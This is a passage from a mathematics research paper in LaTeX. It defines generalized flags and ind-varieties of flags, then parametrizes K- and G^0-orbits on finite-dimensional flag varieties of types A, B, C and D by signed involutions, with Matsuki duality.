By $s(F)\in\mathcal{F}''$ we denote the immediate successor of $F\in\mathcal{F}'$.
A {\em generalized flag} in $\mathbf{V}$ is a chain of subspaces $\mathcal{F}$ such that:
\begin{itemize}
\item[\rm (i)] each $F\in\mathcal{F}$ has an immediate successor or predecessor,
i.e., $\mathcal{F}=\mathcal{F}'\cup\mathcal{F}''$;
\item[\rm (ii)] for every $v\in\mathbf{V}\setminus\{0\}$ there is a unique $F_v\in\mathcal{F}'$ such that $v\in s(F_v)\setminus F_v$, i.e.,
$\mathbf{V}\setminus\{0\}=\bigcup_{F\in\mathcal{F}'}(s(F)\setminus F)$.
\end{itemize}
A generalized flag is {\em maximal} if it is not properly contained in another generalized flag.
Specifically, $\mathcal{F}$ is maximal if and only if $\dim s(F)/F=1$ for all $F\in\mathcal{F}'$.
\end{definition}
\begin{notation}
Let $\sigma:\mathbb{N}^*\to (A,\prec)$ be a surjective map onto a totally ordered set.
Let $\underline{v}=(v_1,v_2,\ldots)$ be a basis of $\mathbf{V}$.
For every $a\in A$, let
\[F'_a=\langle v_\ell:\sigma(\ell)\prec a\rangle_\mathbb{C},\quad
F''_a=\langle v_\ell:\sigma(\ell)\preceq a\rangle_\mathbb{C}.\]
Then $\mathcal{F}=\mathcal{F}_\sigma(\underline{v}):=\{F'_a,F''_a:a\in A\}$ is a generalized flag such that
$\mathcal{F}'=\{F'_a:a\in A\}$, $\mathcal{F}''=\{F''_a:a\in A\}$, and $s(F'_a)=F''_a$ for all $a$.
We call such a generalized flag {\em compatible with the basis $\underline{v}$}.
Moreover, $\mathcal{F}_\sigma(\underline{v})$ is maximal if and only if the map $\sigma$ is bijective.
We use the abbreviation $\mathcal{F}_\sigma:=\mathcal{F}_\sigma(E)$.
Note that every generalized flag has a compatible basis \cite[Proposition 4.1]{Dimitrov-Penkov}.
A generalized flag is {\em weakly compatible with $E$} if it is compatible with some basis $\underline{v}$ such that $E\setminus(E\cap \underline{v})$ is finite (equivalently, $\dim\mathbf{V}/\langle E\cap \underline{v}\rangle_\mathbb{C}<\infty$).
\end{notation}
The group $\mathbf{G}(E)$ (as well as $\mathrm{Aut}(\mathbf{V})$) acts on generalized flags in a natural way.
Let $\mathbf{P}_\mathcal{F}\subset\mathbf{G}(E)$ denote the ind-subgroup of elements preserving $\mathcal{F}$.
It is a closed ind-subgroup of $\mathbf{G}(E)$.
If $\mathcal{F}$ is compatible with $E$, then $\mathbf{P}_\mathcal{F}$ is a splitting parabolic ind-subgroup of $\mathbf{G}(E)$ in the sense that
it is locally parabolic (i.e., there exists an exhaustion of $\mathbf{G}(E)$ by finite-dimensional reductive algebraic subgroups $G_n$ such that the intersections $\mathbf{P}_\mathcal{F}\cap G_n$ are parabolic subgroups of $G_n$) and contains the Cartan ind-subgroup $\mathbf{H}(E)\subset \mathbf{G}(E)$ of elements diagonal in $E$.
Moreover if $\mathcal{F}$ is maximal, then $\mathbf{B}_\mathcal{F}:=\mathbf{P}_\mathcal{F}$ is a splitting Borel ind-subgroup
(i.e., all intersections $\mathbf{B}_\mathcal{F}\cap G_n$ as above are Borel subgroups of $G_n$).
\begin{definition}[\cite{Dimitrov-Penkov}]
Two generalized flags $\mathcal{F},\mathcal{G}$ are called {\em $E$-commensurable}
if $\mathcal{F},\mathcal{G}$ are weakly compatible with $E$, and there is an isomorphism $\phi:\mathcal{F}\to\mathcal{G}$ of ordered sets and a finite dimensional subspace $U\subset\mathbf{V}$ such that
\begin{itemize}
\item[\rm (i)] $\phi(F)+U=F+U$ for all $F\in\mathcal{F}$;
\item[\rm (ii)] $\dim \phi(F)\cap U=\dim F\cap U$ for all $F\in\mathcal{F}$.
\end{itemize}
\end{definition}
$E$-commensurability is an equivalence relation on the set of generalized flags weakly compatible with $E$. In fact, according to the following proposition, each equivalence class consists of a single $\mathbf{G}(E)$-orbit.
If $\mathcal{F}$ is a generalized flag weakly compatible with $E$ we denote by $\mathbf{X}(\mathcal{F},E)$ the set of generalized flags which are $E$-commensurable with $\mathcal{F}$.
\begin{proposition}[\cite{Dimitrov-Penkov}]
\label{P2.3-1}
The set $\mathbf{X}=\mathbf{X}(\mathcal{F},E)$ is endowed with a natural structure of ind-variety.
Moreover $\mathbf{X}$ is $\mathbf{G}(E)$-homogeneous and the map $g\mapsto g\mathcal{F}$ induces an isomorphism of ind-varieties $\mathbf{G}(E)/\mathbf{P}_\mathcal{F}\stackrel{\sim}{\to}\mathbf{X}$.
\end{proposition}
\begin{proposition}[\cite{Fresse-Penkov}]
\label{P2-3.2}
Let $\sigma:\mathbb{N}^*\to (A,\prec)$ and $\tau:\mathbb{N}^*\to (B,\prec)$ be maps onto two totally ordered sets.
\begin{itemize}
\item[\rm (a)] Each $E$-compatible generalized flag in $\mathbf{X}(\mathcal{F}_\sigma,E)$ is of the form $\mathcal{F}_{\sigma w}$ for $w\in \mathfrak{S}_\infty$.
Moreover $\mathcal{F}_{\sigma w}=\mathcal{F}_{\sigma w'}\Leftrightarrow
w'w^{-1}\in\mathrm{Stab}_\sigma:=\{v\in\mathfrak{S}_\infty:\sigma v=\sigma\}$.
\item[\rm (b)] Assume that $\mathcal{F}_\tau$ is maximal (i.e., $\tau$ is bijective)
so that $\mathbf{B}_{\mathcal{F}_\tau}$ is a splitting Borel ind-subgroup.
Then each $\mathbf{B}_{\mathcal{F}_\tau}$-orbit of $\mathbf{X}(\mathcal{F}_\sigma,E)$
contains a unique element of the form $\mathcal{F}_{\sigma w}$ for $w\in\mathfrak{S}_\infty/\mathrm{Stab}_\sigma$.
\item[\rm (c)] In particular, if $\mathcal{F}_\sigma,\mathcal{F}_\tau$ are both maximal (i.e., $\sigma,\tau$ are both bijective), then
\begin{eqnarray*}
\displaystyle \mathbf{X}(\mathcal{F}_\tau,E)\times\mathbf{X}(\mathcal{F}_\sigma,E)=\bigsqcup_{w\in\mathfrak{S}_\infty}(\pmb{\mathbb{O}}_{\tau,\sigma})_w
\end{eqnarray*}
where
\begin{eqnarray*}
(\pmb{\mathbb{O}}_{\tau,\sigma})_w:=\{(g\mathcal{F}_\tau,g\mathcal{F}_{\sigma w}):g\in\mathbf{G}(E)\}
\end{eqnarray*}
is a decomposition of $\mathbf{X}(\mathcal{F}_\tau,E)\times\mathbf{X}(\mathcal{F}_\sigma,E)$ into $\mathbf{G}(E)$-orbits.
\end{itemize}
\end{proposition}
\begin{remark}
The orbit $(\pmb{\mathbb{O}}_{\tau,\sigma})_w$
of Proposition \ref{P2-3.2}\,{\rm (c)}
actually consists of all couples of generalized flags $(\mathcal{F}_\tau(\underline{v}),\mathcal{F}_{\sigma w}(\underline{v}))$
weakly compatible with the basis $\underline{v}=(v_1,v_2,\ldots)$.
\end{remark}
Assume $\mathbf{V}$ is endowed with a nondegenerate symmetric or symplectic form $\omega$ whose values on the basis $E$ are given by the matrix $\Omega$ in (\ref{omega}).
\begin{definition}
A generalized flag $\mathcal{F}$ is called {\em $\omega$-isotropic} if
the map $F\mapsto F^\perp:=\{x\in\mathbf{V}:\omega(x,y)=0\ \forall y\in F\}$
is a well-defined involution of $\mathcal{F}$.
\end{definition}
\begin{proposition}[\cite{Dimitrov-Penkov}]
\label{P2.3-3}
Let $\mathcal{F}$ be an $\omega$-isotropic generalized flag weakly compatible with $E$.
The set $\mathbf{X}_\omega(\mathcal{F},E)$ of all
$\omega$-isotropic generalized flags which are $E$-commensurable with $\mathcal{F}$
is a $\mathbf{G}(E,\omega)$-homogeneous, closed ind-subvariety of $\mathbf{X}(\mathcal{F},E)$.
\end{proposition}
Finally, we emphasize that one of the main features of classical ind-groups is that their Borel ind-subgroups are not $\mathrm{Aut}(\mathbf{G})$-conjugate. Here are three examples of maximal generalized flags in $\mathbf{V}$, compatible with the basis $E$ and such that their stablizers in $\mathbf{G}(E)$ are pairwise not $\mathrm{Aut}(\mathbf{G})$-conjugate.
\begin{example}
{\rm (a)} Let $\sigma_1:\mathbb{N}^*\to(\mathbb{N}^*,<)$, $\ell\mapsto\ell$.
The generalized flag $\mathcal{F}_{\sigma_1}$ is an ascending chain of subspaces
$\mathcal{F}_{\sigma_1}=\{0=F_0\subset F_1\subset F_2\subset\ldots\}$ isomorphic to $(\mathbb{N},<)$ as an ordered set.
\\
{\rm (b)} Let $\sigma_2:\mathbb{N}^*\to\Big(\{\frac{1}{n}:n\in\mathbb{Z}^*\},<\Big)$, $\ell\mapsto \frac{(-1)^\ell}{\ell}$.
The generalized flag $\mathcal{F}_{\sigma_2}$ is a chain of the form
$\mathcal{F}_{\sigma_2}=\{0=F_0\subset F_1\subset\ldots\subset F_{-2}\subset F_{-1}=\mathbf{V}\}$
and is not isomorphic as ordered set to a subset of $(\mathbb{Z},<)$.
\\
{\rm (c)} Let $\sigma_3:\mathbb{N}^*\to(\mathbb{Q},<)$ be a bijection.
In this case no subspace $F\in\mathcal{F}_{\sigma_3}$ has both immediate successor or immediate predecessor.
\end{example}
\section{Parametrization of orbits in the finite-dimensional case}
\label{S3}
In Sections~\ref{S3.1}-\ref{S3.3}, we state explicit parametrizations of the $K$- and $G^0$-orbits in the finite-dimensional case. All proofs are given in Section~\ref{S3.5}.
\subsection{Types A1 and A2}
\label{S3.1}
Let the notation be as in Subsection~\ref{S:A1A2}.
The space $V=V_n:=\langle e_1,\ldots,e_n\rangle_\mathbb{C}$ is endowed with the symmetric
or symplectic form $\omega(x,y)={}^tx\cdot \Omega\cdot y$ and the conjugation $\gamma(x)=\Omega\overline{x}$ which actually stand for the restrictions to $V$ of the maps $\omega,\gamma$ introduced in Section \ref{S2.1}.
This allows us to define two involutions of the flag variety $X$:
\[
\mathcal{F}=(F_0,\ldots,F_n)\mapsto\mathcal{F}^\perp:=(F_n^\perp,\ldots,F_0^\perp)
\quad\mbox{and}\quad
\mathcal{F}\mapsto\gamma(\mathcal{F}):=(\gamma(F_0),\ldots,\gamma(F_n))
\]
where $F^\perp\subset V$ stands for the subspace orthogonal to $F$ with respect to $\omega$.
Let $K=\{g\in\mathrm{GL}(V):\mbox{$g$ preserves $\omega$}\}$
and $G^0=\{g\in\mathrm{GL}(V):\gamma g=g\gamma\}$.
By $\mathfrak{I}_n\subset\mathfrak{S}_n$ we denote the
subset of involutions.
If $n=2m$ is even, we let $\mathfrak{I}'_n\subset\mathfrak{I}_n$
be the subset of involutions $w$ without fixed points.
\begin{definition}
\label{DA12}
Let $w\in\mathfrak{I}_n$. Set $\epsilon:=1$ in type A1 and
$\epsilon:=-1$ in type A2. A basis $(v_1,\ldots,v_n)$ of $V$ such that
\[\omega(v_k,v_\ell)=\left\{\begin{array}{ll} 1 & \mbox{if $w_k=\ell\geq k$} \\ \epsilon & \mbox{if $w_k=\ell< k$} \\ 0 & \mbox{if $w_k\not=\ell$} \end{array}\right.
\ \mbox{ for all $k,\ell\in\{1,\ldots,n\}$}\] is said to be {\em
$w$-dual}. A basis $(v_1,\ldots,v_n)$ of $V$ such that
\[
\gamma(v_k)=\left\{\begin{array}{ll} \epsilon v_{w_k} & \mbox{if $w_k\geq k$}
\\ v_{w_k} & \mbox{if $w_k< k$}
\end{array}\right.
\ \mbox{ for all $k\in\{1,\ldots,n\}$}
\]
is said to be {\em $w$-conjugate}. Set
\begin{eqnarray*}
& \mathcal{O}_w=\{\mathcal{F}(v_1,\ldots,v_n):\mbox{$(v_1,\ldots,v_n)$ is a $w$-dual basis}\}, \\[1mm]
& \mathfrak{O}_w=\{\mathcal{F}(v_1,\ldots,v_n):\mbox{$(v_1,\ldots,v_n)$ is a $w$-conjugate basis}\}.
\end{eqnarray*}
\end{definition}
\begin{proposition}
\label{P1} Let $\mathfrak{I}_n^\epsilon=\mathfrak{I}_n$ in type A1
and $\mathfrak{I}_n^\epsilon=\mathfrak{I}'_n$ in type A2. Recall the notation
$\mathbb{O}_w$ and $w_0$ introduced in Section \ref{S2.2}.
\begin{itemize}
\item[\rm (a)]
For every $w\in\mathfrak{I}_n^\epsilon$ we have
$\mathcal{O}_w\not=\emptyset$, $\mathfrak{O}_w\not=\emptyset$
and
\[\mathcal{O}_w\cap\mathfrak{O}_w=\{\mathcal{F}(v_1,\ldots,v_n):\mbox{$(v_1,\ldots,v_n)$ is both $w$-dual and $w$-conjugate}\}\not=\emptyset.\]
\item[\rm (b)]
For every $w\in \mathfrak{I}_n^\epsilon$,
\[
\mathcal{O}_w=\{\mathcal{F}\in
X:(\mathcal{F}^\perp,\mathcal{F})\in\mathbb{O}_{w_0w}\}
\quad\mbox{and}\quad \mathfrak{O}_w=\{\mathcal{F}\in
X:(\gamma(\mathcal{F}),\mathcal{F})\in\mathbb{O}_{w}\}.
\]
\item[\rm (c)]
The subsets $\mathcal{O}_w$ ($w\in\mathfrak{I}_n^\epsilon$) are
exactly the $K$-orbits of $X$. The subsets $\mathfrak{O}_w$
($w\in\mathfrak{I}_n^\epsilon$) are exactly the $G^0$-orbits of $X$.
\item[\rm (d)]
The map $\mathcal{O}_w\mapsto\mathfrak{O}_w$ is Matsuki duality.
\end{itemize}
\end{proposition}
\subsection{Type A3}
\label{S3.2}
Let the notation be as in Subsection~\ref{S:A3}: the space $V=V_n=\langle e_1,\ldots,e_n\rangle_\mathbb{C}$ is endowed with the hermitian form $\phi(x,y)={}^t\overline{x}\Phi y$ and a conjugation $\delta(x)=\Phi x$ where $\Phi$ is a diagonal matrix with entries $\epsilon_1,\ldots,\epsilon_n\in\{+1,-1\}$ (the left upper $n\times n$-corner of the matrix $\Phi$ of Section \ref{S2.1}).
Set $V_+=\langle e_k:\epsilon_k=1\rangle_\mathbb{C}$ and $V_-=\langle e_k:\epsilon_k=-1\rangle_\mathbb{C}$. Then $V=V_+\oplus V_-$.
Let $K=\{g\in\mathrm{GL}(V):\delta g=g\delta\}=\mathrm{GL}(V_+)\times\mathrm{GL}(V_-)$ and $G^0=\{g\in \mathrm{GL}(V):\mbox{$g$ preserves $\phi$}\}$.
As in Section \ref{S3.1} we get two involutions of the flag variety $X$:
\[\mathcal{F}=(F_0,\ldots,F_n)\mapsto\delta(\mathcal{F}):=(\delta(F_0),\ldots,\delta(F_n))\quad\mbox{and}\quad\mathcal{F}\mapsto\mathcal{F}^\dag:=(F_n^\dag,\ldots,F_0^\dag)\]
where $F^\dag\subset V$ stands for the orthogonal of $F\subset V$ with respect to $\phi$.
The hermitian form on the quotient $F/(F\cap F^\dag)$ induced by $\phi$ is
nondegenerate; we denote its signature by $\varsigma(\phi:F)$. Given $\mathcal{F}=(F_0,\ldots,F_n)\in X$, let
\[\varsigma(\phi:\mathcal{F}):=\big(\varsigma(\phi:F_\ell)\big)_{\ell=1}^n\in(\{0,\ldots,n\}^2)^n.\]
Then
\[\varsigma(\delta:\mathcal{F}):=\big((\dim F_\ell\cap V_+,\dim F_\ell\cap V_-)\big)_{\ell=1}^n\in(\{0,\ldots,n\}^2)^n\]
records the relative position of $\mathcal{F}$ with respect to the subspaces
$V_+$ and
$V_-$.
\medskip
\paragraph{\bf Combinatorial notation}
We call a {\em signed involution} a pair $(w,\varepsilon)$ consisting of
an involution $w\in\mathfrak{I}_n$ and signs
$\varepsilon_k\in\{+1,-1\}$ attached to its fixed points
$k\in\{\ell:w_\ell=\ell\}$.
(Equivalently $\varepsilon$ is a map $\{\ell:w_\ell=\ell\}\to\{+1,-1\}$.)
It is convenient to represent $w$ by a graph $l(w)$ (called {\em link pattern}) with $n$ vertices
$1,2,\ldots,n$ and an arc $(k,w_k)$ connecting $k$ and $w_k$ whenever $k<w_k$.
The {\em signed link pattern $l(w,\varepsilon)$} is
obtained from the graph $l(w)$ by marking each vertex
$k\in\{\ell:w_\ell=\ell\}$ with the label $+$ or $-$ depending on
whether $\varepsilon_k=+1$ or $\varepsilon_k=-1$.
For instance, the signed link pattern (where the numbering of vertices is implicit)
\[
\begin{picture}(140,30)(-20,-5)
\courbe{-16}{32}{0}{8}{10}{12}{16} \courbe{0}{80}{0}{36}{40}{44}{24}
\courbe{96}{112}{0}{103}{104}{105}{6} \put(-18,-3){$\bullet$}
\put(-2,-3){$\bullet$} \put(14,-3){$\bullet$} \put(13,-9){$+$}
\put(30,-3){$\bullet$} \put(46,-3){$\bullet$} \put(45,-9){$-$}
\put(62,-3){$\bullet$} \put(61,-9){$+$} \put(78,-3){$\bullet$}
\put(94,-3){$\bullet$} \put(110,-3){$\bullet$}
\end{picture}
\]
represents $(w,\varepsilon)$ with
$w=(1;4)(2;7)(8;9)\in\mathfrak{I}_9$ and
$(\varepsilon_3,\varepsilon_5,\varepsilon_6)=(+1,-1,+1)$.
We define $\varsigma(w,\varepsilon):=\{(p_\ell,q_\ell)\}_{\ell=1}^n$
as the sequence given by
\[
p_\ell\mbox{ (resp., $q_\ell$)}=\parbox[t]{8cm}{(number of $+$ signs
\mbox{ (resp., $-$ signs)} and arcs among the first $\ell$ vertices of
$l(w,\varepsilon)$).}
\]
Assuming $n=p+q$, let $\mathfrak{I}_n(p,q)$ be the set of
signed involutions of signature $(p,q)$, i.e., such that $(p_n,q_n)=(p,q)$.
Note that the elements of $\mathfrak{I}_n(p,q)$ coincide with the clans of signature $(p,q)$
in the sense of \cite{MO,Y}.
For instance, for the above pair
$(w,\varepsilon)$ we have
$(w,\varepsilon)\in\mathfrak{I}_9(5,4)$ and
\[
\varsigma(w,\varepsilon)=\big((0,0),(0,0),(1,0),(2,1),(2,2),(3,2),(4,3),(4,3),(5,4)\big).
\]
\begin{definition}
\label{D2}
\label{DA3}
Given a signed involution
$(w,\varepsilon)$, we say that
a basis $(v_1,\ldots,v_n)$ of $V$ is \emph{$(w,\epsilon)$-conjugate} if
\[
\delta(v_k)=\left\{\begin{array}{ll} \varepsilon_kv_{w_k} & \mbox{if
$w_k=k$}
\\ v_{w_k} & \mbox{if $w_k\not=k$}
\end{array}\right.
\ \mbox{ for all $k\in\{1,\ldots,n\}$\,.}
\]
A basis
$(v_1,\ldots,v_n)$ such that
\[\phi(v_k,v_\ell)=\left\{\begin{array}{ll} \varepsilon_k & \mbox{if $w_k=\ell=k$} \\ 1 & \mbox{if $w_k=\ell\not=k$} \\ 0 & \mbox{if $w_k\not=\ell$} \end{array}\right.
\ \mbox{ for all $k,\ell\in\{1,\ldots,n\}$}\] is said to be {\em
$(w,\varepsilon)$-dual}.
We set
\begin{eqnarray*}
& \mathcal{O}_{(w,\varepsilon)}=\{\mathcal{F}(v_1,\ldots,v_n):\mbox{$(v_1,\ldots,v_n)$ is a $(w,\varepsilon)$-conjugate basis}\}, \\[1mm]
& \mathfrak{O}_{(w,\varepsilon)}=\{\mathcal{F}(v_1,\ldots,v_n):\mbox{$(v_1,\ldots,v_n)$ is a $(w,\varepsilon)$-dual basis}\}.
\end{eqnarray*}
\end{definition}
\begin{proposition}
\label{P2}
In addition to the above notation, let $(p,q)=(\dim V_+,\dim V_-)$. Then:
\begin{itemize}
\item[\rm (a)] For every $(w,\varepsilon)\in\mathfrak{I}_n(p,q)$ the subsets $\mathcal{O}_{(w,\varepsilon)}$ and $\mathfrak{O}_{(w,\varepsilon)}$ are nonempty, and
\[\mathcal{O}_{(w,\varepsilon)}\cap\mathfrak{O}_{(w,\varepsilon)}
=\{\mathcal{F}(\underline{v}):\mbox{$\underline{v}=(v_k)_{k=1}^n$ is $(w,\varepsilon)$-dual and $(w,\varepsilon)$-conjugate}\}\not=\emptyset.\]
\item[\rm (b)]
For every $(w,\varepsilon)\in \mathfrak{I}_n(p,q)$,
\begin{eqnarray*}
& \mathcal{O}_{(w,\varepsilon)}=\big\{\mathcal{F}\in
X: (\delta(\mathcal{F}),\mathcal{F})\in\mathbb{O}_{w}\mbox{ and
}\varsigma(\delta:\mathcal{F})=\varsigma(w,\varepsilon)\big\}, \\
&\mathfrak{O}_{(w,\varepsilon)}=\big\{\mathcal{F}\in X:
(\mathcal{F}^\dag,\mathcal{F})\in\mathbb{O}_{w_0w}\mbox{ and
}\varsigma(\phi:\mathcal{F})=\varsigma(w,\varepsilon)\big\}.
\end{eqnarray*}
\item[\rm (c)]
The subsets $\mathcal{O}_{(w,\varepsilon)}$
($(w,\varepsilon)\in\mathfrak{I}_n(p,q)$) are exactly the $K$-orbits
of $X$. The subsets $\mathfrak{O}_{(w,\varepsilon)}$
($(w,\varepsilon)\in\mathfrak{I}_n(p,q)$) are exactly the
$G^0$-orbits of $X$.
\item[\rm (d)]
The map
$\mathcal{O}_{(w,\varepsilon)}\mapsto\mathfrak{O}_{(w,\varepsilon)}$
is Matsuki duality.
\end{itemize}
\end{proposition}
\subsection{Types B, C, D}
\label{S3.3}
In this section we assume that the space $V=V_n=\langle e_1,\ldots,e_n\rangle_\mathbb{C}$ is endowed with a symmetric or symplectic form $\omega$ whose action on the basis $(e_1,\ldots,e_n)$ is described by the matrix $\Omega$
in (\ref{omega}).
We consider the group $G=G(V,\omega)=\{g\in\mathrm{GL}(V):\mbox{$g$ preserves $\omega$}\}$ and the variety of isotropic flags $X_\omega=\{\mathcal{F}\in X:\mathcal{F}^\perp=\mathcal{F}\}$
(see Section \ref{S2.2}).
In addition we assume that $V$ is endowed with a hermitian form $\phi$, a conjugation $\delta$, and a decomposition $V=V_+\oplus V_-$ (as in Section \ref{S3.2}) such that
\begin{itemize}
\item in types BD1 and C2, the restriction of $\omega$ to $V_+$ and $V_-$ is nondegenerate, i.e., $V_+^\perp=V_-$,
\item in types C1 and D3, $V_+$ and $V_-$ are Lagrangian with respect to $\omega$, i.e., $V_+^\perp=V_+$ and $V_-^\perp=V_-$.
\end{itemize}
Set $K:=\{g\in G:g\delta=\delta g\}$ and $G^0:=\{g\in G:\mbox{$g$ preserves $\phi$}\}$.
\medskip
\paragraph{\bf Combinatorial notation}
Recall that $w_0(k)=n-k+1$.
Let $(\eta,\epsilon)\in\{1,-1\}^2$.
A signed involution $(w,\varepsilon)$ is called {\em $(\eta,\epsilon)$-symmetric} if the following conditions hold
\begin{itemize}
\item[(i)] $ww_0=w_0w$ (so that the set $\{\ell:w_\ell=\ell\}$ is $w_0$-stable);
\item[(ii)] $\varepsilon_{w_0(k)}=\eta \varepsilon_k$ for all $k\in\{\ell:w_\ell=\ell\}$;
\end{itemize}
and in the case where $\eta\not=\epsilon$:
\begin{itemize}
\item[(iii)]$w_k\not=w_0(k)$ for all $k$.
\end{itemize}
Assuming $n=p+q$, let $\mathfrak{I}_n^{\eta,\epsilon}(p,q)\subset\mathfrak{I}_n(p,q)$ denote the subset of signed involutions of signature $(p,q)$ which are $(\eta,\epsilon)$-symmetric.
Specifically, $(w,\varepsilon)$ is $(1,1)$-symmetric when the signed link pattern $l(w,\varepsilon)$ is symmetric;
$(w,\varepsilon)$ is $(1,-1)$-symmetric when $l(w,\varepsilon)$ is symmetric and does not have symmetric arcs (i.e., joining $k$ and $n-k+1$);
$(w,\varepsilon)$ is $(-1,-1)$-symmetric
when $l(w,\varepsilon)$ is antisymmetric
in the sense that the mirror image of $l(w,\varepsilon)$ is a signed link pattern with the same arcs but opposite signs; $(w,\varepsilon)$ is $(-1,1)$-symmetric when $l(w,\varepsilon)$ is antisymmetric and does not have symmetric arcs. For instance:
\begin{eqnarray*}
& \begin{array}[t]{c}
\begin{picture}(140,30)(-20,-5)
\courbe{-16}{32}{0}{8}{10}{12}{16} \courbe{0}{96}{0}{40}{48}{56}{26}
\courbe{64}{112}{0}{86}{88}{90}{16} \put(-18,-3){$\bullet$}
\put(-2,-3){$\bullet$} \put(14,-3){$\bullet$} \put(13,-9){$+$}
\put(30,-3){$\bullet$} \put(46,-3){$\bullet$} \put(45,-9){$-$}
\put(62,-3){$\bullet$} \put(77,-9){$+$} \put(78,-3){$\bullet$}
\put(94,-3){$\bullet$} \put(110,-3){$\bullet$}
\end{picture}
\\[1mm]
\mbox{$(w,\varepsilon)\in\mathfrak{I}^{1,1}_9(5,4),$}
\end{array}
\qquad
\begin{array}[t]{c}
\begin{picture}(140,30)(-20,-5)
\courbe{-16}{32}{0}{8}{10}{12}{16} \courbe{0}{112}{0}{48}{56}{64}{28}
\courbe{80}{128}{0}{102}{104}{106}{16} \put(-18,-3){$\bullet$}
\put(-2,-3){$\bullet$} \put(14,-3){$\bullet$} \put(13,-9){$+$}
\put(30,-3){$\bullet$} \put(46,-3){$\bullet$} \put(45,-9){$-$}
\put(62,-3){$\bullet$} \put(61,-9){$+$} \put(78,-3){$\bullet$}
\put(94,-3){$\bullet$} \put(93,-9){$-$} \put(110,-3){$\bullet$} \put(126,-3){$\bullet$}
\end{picture}
\\[1mm]
\mbox{$(w,\varepsilon)\in\mathfrak{I}^{-1,-1}_{10}(5,5)$,}
\end{array} \\
& \begin{array}[t]{c}
\begin{picture}(140,30)(-20,-5)
\courbe{-16}{32}{0}{8}{10}{12}{16}
\courbe{80}{128}{0}{102}{104}{106}{16} \put(-18,-3){$\bullet$}
\put(-2,-3){$\bullet$} \put(-3,-9){$-$} \put(14,-3){$\bullet$} \put(13,-9){$+$}
\put(30,-3){$\bullet$} \put(46,-3){$\bullet$} \put(45,-9){$+$}
\put(62,-3){$\bullet$} \put(61,-9){$+$} \put(78,-3){$\bullet$}
\put(94,-3){$\bullet$} \put(93,-9){$+$} \put(110,-3){$\bullet$} \put(109,-9){$-$} \put(126,-3){$\bullet$}
\end{picture}\\[1mm]
\mbox{$(w,\varepsilon)\in\mathfrak{I}^{1,-1}_{10}(6,4),$}
\end{array}
\qquad
\begin{array}[t]{c}
\begin{picture}(140,30)(-20,-5)
\courbe{-16}{32}{0}{8}{10}{12}{16}
\courbe{80}{128}{0}{102}{104}{106}{16} \put(-18,-3){$\bullet$}
\put(-2,-3){$\bullet$} \put(-3,-9){$-$} \put(14,-3){$\bullet$} \put(13,-9){$+$}
\put(30,-3){$\bullet$} \put(46,-3){$\bullet$} \put(45,-9){$-$}
\put(62,-3){$\bullet$} \put(61,-9){$+$} \put(78,-3){$\bullet$}
\put(94,-3){$\bullet$} \put(93,-9){$-$} \put(110,-3){$\bullet$} \put(109,-9){$+$} \put(126,-3){$\bullet$}
\end{picture}
\\[1mm]
\mbox{$(w,\varepsilon)\in\mathfrak{I}^{-1,1}_{10}(5,5)$.}
\end{array}
\end{eqnarray*}
\begin{proposition}
\label{P3}
Let $(p,q)=(\dim V_+,\dim V_-)$ (so that $p=q=\frac{n}{2}$ in types C1 and D3).
Set
$(\eta,\epsilon)=(1,1)$ in type BD1,
$(\eta,\epsilon)=(1,-1)$ in type C2,
$(\eta,\epsilon)=(-1,-1)$ in types C1, and
$(\eta,\epsilon)=(-1,1)$ in type D3.
\begin{itemize}
\item[(a)] For every $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$,
considering bases $\underline{v}=(v_1,\ldots,v_n)$ of $V$ such that
\begin{equation}
\label{3.3.18}
\omega(v_k,v_\ell)=\left\{\begin{array}{ll} 0 & \mbox{if $\ell\not=n-k+1$}
\\
1 & \mbox{if $\ell=n-k+1$ and $w_k,w_\ell\in[k,\,\ell]$ ($k\leq\ell$)} \\
\epsilon & \mbox{if $\ell=n-k+1$ and $w_k,w_\ell\in[\ell,\,k]$ ($\ell\leq k$)} \\
\eta & \mbox{if $\ell=n-k+1$ and $k,\ell\in]w_k,\,w_\ell[$} \\
\eta\epsilon & \mbox{if $\ell=n-k+1$ and $k,\ell\in]w_\ell,\,w_k[$,} \\
\end{array}\right.
\end{equation}
we have
\begin{eqnarray*}
& & \mathcal{O}^{\eta,\epsilon}_{(w,\varepsilon)}:=\mathcal{O}_{(w,\varepsilon)}\cap X_\omega=\{\mathcal{F}(\underline{v}):\underline{v}\mbox{ is $(w,\varepsilon)$-conjugate and satisfies (\ref{3.3.18})}\}\not=\emptyset, \\
& & \mathfrak{O}^{\eta,\epsilon}_{(w,\varepsilon)}:=\mathfrak{O}_{(w,\varepsilon)}\cap X_\omega=\{\mathcal{F}(\underline{v}):\underline{v}\mbox{ is $(w,\varepsilon)$-dual and satisfies (\ref{3.3.18})}\}\not=\emptyset, \\
& & \mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}\cap\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}
\\
&&\phantom{aaa}=\{\mathcal{F}(\underline{v}):\underline{v}\mbox{ is $(w,\varepsilon)$-conjugate and $(w,\varepsilon)$-dual and satisfies (\ref{3.3.18})}\}\not=\emptyset.
\end{eqnarray*}
\item[(b)] The subsets $\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ ($(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$) are exactly the $K$-orbits of $X_\omega$.
The subsets $\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ ($(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$) are exactly the $G^0$-orbits of $X_\omega$.
\item[(c)] The map $\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}\mapsto \mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ is Matsuki duality.
\end{itemize}
\end{proposition}
\subsection{Remarks}
Set $X_0:=X$ in type A and $X_0:=X_\omega$ in types B, C, D.
\begin{remark}
\label{R3.4.1}
The characterization of the $K$-orbits in Propositions \ref{P1}--\ref{P3} can be stated in the following unified way. For $\mathcal{F}\in X$ we write
$\sigma(\mathcal{F})=\mathcal{F}^\perp$ in types A1--A2 and
$\sigma(\mathcal{F})=\delta(\mathcal{F})$ in types A3, BD1, C1--C2, D3. Let $P\subset
G$ be a parabolic subgroup containing $K$ and which is minimal for
this property. Two flags $\mathcal{F}_1,\mathcal{F}_2\in X_0$ belong
to the same $K$-orbit if and only if
$(\sigma(\mathcal{F}_1),\mathcal{F}_1)$ and
$(\sigma(\mathcal{F}_2),\mathcal{F}_2)$ belong to the same orbit of $P$ for the diagonal action of $P$ on $X_0\times X_0$.
\end{remark}
